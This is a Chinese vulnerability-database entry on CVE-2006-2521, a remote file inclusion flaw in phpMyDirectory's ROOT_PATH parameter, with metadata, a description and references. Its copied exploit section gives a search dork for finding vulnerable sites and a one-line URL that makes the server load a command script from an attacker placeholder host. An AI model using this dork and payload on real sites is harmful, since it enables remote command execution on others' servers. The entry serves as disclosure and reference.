phpMyDirectory ROOT_PATH参数 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110300 漏洞类型 代码注入
发布时间 2006-05-19 更新时间 2006-05-22
CVE编号 CVE-2006-2521 CNNVD-ID CNNVD-200605-423
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1808
https://www.securityfocus.com/bid/87596
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-423
|漏洞详情
phpMyDirectory是一种多功能的基于Web的目录管理系统。phpMyDirectory处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。phpMyDirectory的多个脚本没有正确验证ROOT_PATH参数的输入,攻击者通过包含本地或外部资源的任意文件导致执行任意PHP代码。
|漏洞EXP
Title       : phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability
-
URL         : http://www.phpmydirectory.com/
-
Dork        : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com"
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit     : http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls

# milw0rm.com [2006-05-19]
|受影响的产品
Accomplishtechnology Phpmydirectory 10.4.4 Accomplishtechnology Phpmydirectory 10.1.3 Accomplishtechnology Phpmydirectory 1.3 b Accomplishtechnology Phpmydirectory 1.2 b Accomplishtechnolog
|参考资料

来源:VUPEN
名称:ADV-2006-1896
链接:http://www.frsirt.com/english/advisories/2006/1896
来源:SECUNIA
名称:20209
链接:http://secunia.com/advisories/20209
来源:MILW0RM
名称:1808
链接:http://milw0rm.com/exploits/1808
来源:XF
名称:phpmydirectory-rootpath-file-include(26625)
链接:http://xforce.iss.net/xforce/xfdb/26625